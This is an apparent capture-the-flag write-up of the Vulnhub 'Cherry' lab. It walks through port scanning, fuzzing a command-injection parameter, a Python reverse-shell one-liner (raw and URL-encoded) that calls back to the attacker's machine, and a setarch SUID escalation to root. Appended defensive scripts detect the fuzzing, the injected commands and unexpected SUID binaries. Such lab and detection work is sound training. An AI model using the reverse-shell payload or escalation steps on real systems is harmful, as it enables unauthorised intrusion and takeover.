Cherry
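Identifying the target host's IP address
The target host cannot obtain an IP address automatically, so first fix that problem by following my other post.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]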
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:92:75:55 1 60 PCS Systemtechnik GmbH
192.168.56.178 08:00:27:8b:af:48 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.178.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.178 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 20:40 EST
Nmap scan report for 192.168.56.178
Host is up (0.000076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8bc6f56e2ca29513a51084a50c83b7ae (RSA)
| 256 38d823063e862ac90f163f2393d9a106 (ECDSA)
|_ 256 95b9d4f0984ad90990a45da79d6dce76 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cherry
|_http-server-header: nginx/1.18.0 (Ubuntu)
7755/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Cherry
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:8B:AF:48 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds
The NMAP scan shows that the target host has 4 open ports: 22 (SSH), 80 (HTTP), 7755 (HTTP), 33060 (Mysqlx).
Getting a shell
Port 80
Download the image to the local Kali Linux machine for analysis:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ steghide extract -sf img.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ stegseek img.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.95% (133.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ exiftool img.jpg
ExifTool Version Number : 12.52
File Name : img.jpg
Directory : .
File Size : 59 kB
File Modification Date/Time : 2023:01:30 20:43:41-05:00
File Access Date/Time : 2023:01:30 20:44:03-05:00
File Inode Change Date/Time : 2023:01:30 20:43:41-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 1024
Image Height : 1024
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1024x1024
Megapixels : 1.0
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ nikto -h http://192.168.56.178
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.178
+ Target Hostname: 192.168.56.178
+ Target Port: 80
+ Start Time: 2023-01-30 20:45:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2023-01-30 20:45:24 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (nginx/1.18.0) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/30 20:46:28 Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 178] [--> http://192.168.56.178/backup/]
Progress: 214882 / 220561 (97.43%)===============================================================
2023/01/30 20:46:43 Finished
===============================================================
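gobuster found the backup directory; accessing it returns Forbidden.
Port 7755
The natural next step is to visit the backup directory on port 7755, which turns out to be accessible. Download the files locally: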
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/latest.tar.gz .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak
mv: missing destination file operand after '/home/kali/Downloads/master.zip.bak'
Try 'mv --help' for more information.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak .
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg latest.tar.gz master.zip master.zip.bak nmap_full_scan
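Accessing /backup/command.php returns an empty response. Does a parameter need to be fuzzed? Set that aside for now and check whether the downloaded files contain anything valuable.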
┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ gobuster dir -u http://192.168.56.178:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178:7755
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/01/30 20:54:25 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 281]
/index.html (Status: 200) [Size: 640]
/.php (Status: 403) [Size: 281]
/info.php (Status: 200) [Size: 72699]
/backup (Status: 301) [Size: 324] [--> http://192.168.56.178:7755/backup/]
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/server-status (Status: 403) [Size: 281]
Progress: 1097489 / 1102805 (99.52%)===============================================================
2023/01/30 20:55:31 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ wfuzz -c -u 'http://192.168.56.178:7755/backup/command.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 22
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.178:7755/backup/command.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001626: 200 13 L 25 W 306 Ch "backup"
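Fuzzing quickly reveals that the parameter name is backup; a manual check confirms it.
After trying several reverse-shell methods, the python one finally succeeded in getting a shell.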
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://192.168.56.178:7755/backup/command.php?backup=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.178] 45556
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cherry:/var/www/html/backup$
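What the wfuzz run and the follow-up requests to command.php look like from the server side, as an added example (not part of the original post): a Python check over Apache access-log lines that reports endpoints probed with many different parameter names, which name drew a different response size, and query values carrying an interpreter invocation. The log lines are constructed, and the threshold and patterns are assumptions to tune.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache "combined" log lines (illustrative, not captured from the target).
_FMT = '192.168.56.206 - - [30/Jan/2023:20:56:{:02d} -0500] "GET /backup/command.php?{} HTTP/1.1" 200 {} "-" "{}"'
_NAMES = ["index", "images", "download", "news", "crack", "backup", "serial"]
SAMPLE_LOG = "\n".join(
    ['192.168.56.1 - - [30/Jan/2023:20:50:00 -0500] "GET /index.html?lang=en HTTP/1.1" 200 640 "-" "Mozilla/5.0"']
    + [_FMT.format(i, n + "=id", 306 if n == "backup" else 250, "Wfuzz/3.1.0") for i, n in enumerate(_NAMES)]
    + [_FMT.format(30, "backup=python3%20-c%20%27import%20socket%27", 250, "Mozilla/5.0")]
)

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} (\d+|-)')
# Assumed patterns: interpreter invocations and shell paths that should never be a query value.
CMD_RE = re.compile(r"/bin/(?:ba)?sh|\b(?:python3?|perl|php|bash|sh|nc)\s+-\w|socket\.socket|os\.dup2")


def analyse(log_text, fuzz_threshold=5):
    """Return (fuzzing, injection) findings from access-log text.

    fuzzing:   {(client, path): parameter names whose response size differs from the usual one}
    injection: sorted list of (client, path, parameter) carrying command-like values
    """
    seen = defaultdict(dict)          # (client, path) -> {parameter name: first response size}
    injection = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                  # skip lines that are not in the expected format
        client, target, size = m.groups()
        url = urlsplit(target)
        for pair in filter(None, url.query.split("&")):
            name, _, raw = pair.partition("=")
            seen[(client, url.path)].setdefault(name, size)
            if CMD_RE.search(unquote_plus(raw)):
                injection.add((client, url.path, name))
    fuzzing = {}
    for key, sizes in seen.items():
        if len(sizes) >= fuzz_threshold:          # many distinct names on one endpoint
            usual = Counter(sizes.values()).most_common(1)[0][0]
            fuzzing[key] = sorted(n for n, s in sizes.items() if s != usual)
    return fuzzing, sorted(injection)


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

The size outlier tells the responder which parameter name the scan actually found, so the requests that follow with that name are the ones to review first.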
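Privilege escalation
Upload the linpeas.sh script to the /tmp directory on the target host, change its permissions, and run it. The script's output shows: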
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 39K Apr 2 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 55K Apr 2 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 27K Apr 2 2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
The SUID bit on the setarch command can be used for privilege escalation.
Escalate following the method described on the GTFOBins site:
www-data@cherry:/tmp$ /usr/bin/setarch $(arch) /bin/sh -p
/usr/bin/setarch $(arch) /bin/sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------ 5 root root 4.0K Sep 7 2020 .
drwxr-xr-x 20 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 164 Sep 7 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 7 2020 .local
-rw------- 1 root root 18 Sep 7 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwx------ 2 root root 4.0K Sep 7 2020 .ssh
-rw-r--r-- 1 root root 255 Sep 7 2020 .wget-hsts
-rw-r--r-- 1 root root 46 Sep 7 2020 proof.txt
drwxr-xr-x 3 root root 4.0K Sep 7 2020 snap
# cat proof.txt
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
#
Successfully obtained a root shell and the root flag.
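A defender's version of the SUID check that linpeas performed, as an added example (not part of the original post): compare set-uid/set-gid binaries against a baseline and report the extras, run here over the listing shown above. The BASELINE set is an assumption to be rebuilt from a clean install of the same image; scan() yields the same tuples from a live filesystem.

```python
import os
import stat

# Assumed baseline of set-uid/set-gid binaries expected on the image (not from the page).
BASELINE = {"/usr/bin/fusermount", "/usr/bin/umount", "/usr/bin/mount", "/usr/bin/gpasswd",
            "/usr/bin/at", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo"}

# The listing from the linpeas output above, with the "--->" annotations removed.
LISTING = """\
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 39K Apr 2 2020 /usr/bin/umount
-rwsr-sr-x 1 daemon daemon 55K Nov 12 2018 /usr/bin/at
-rwsr-xr-x 1 root root 55K Apr 2 2020 /usr/bin/mount
-rwsr-sr-x 1 root root 27K Apr 2 2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
"""


def parse_listing(text):
    """Yield (path, owner, setuid, setgid) from `ls -l` style lines."""
    for line in text.splitlines():
        f = line.split()
        if len(f) < 9 or len(f[0]) < 10:
            continue                              # not a full ls -l entry
        mode = f[0]
        yield f[8], f[2], mode[3] in "sS", mode[6] in "sS"


def scan(root):
    """Yield the same tuples for regular files under root on a live system."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                          # vanished or unreadable entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_uid, bool(st.st_mode & stat.S_ISUID), bool(st.st_mode & stat.S_ISGID)


def unexpected(entries, baseline=BASELINE):
    """Return set-uid/set-gid paths missing from the baseline, root-owned ones first."""
    hits = [(owner not in ("root", 0), path) for path, owner, suid, sgid in entries
            if (suid or sgid) and path not in baseline]
    return [path for _, path in sorted(hits)]


if __name__ == "__main__":
    print(unexpected(parse_listing(LISTING)))
```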
From: https://www.cnblogs.com/jason-huawen/p/17078093.html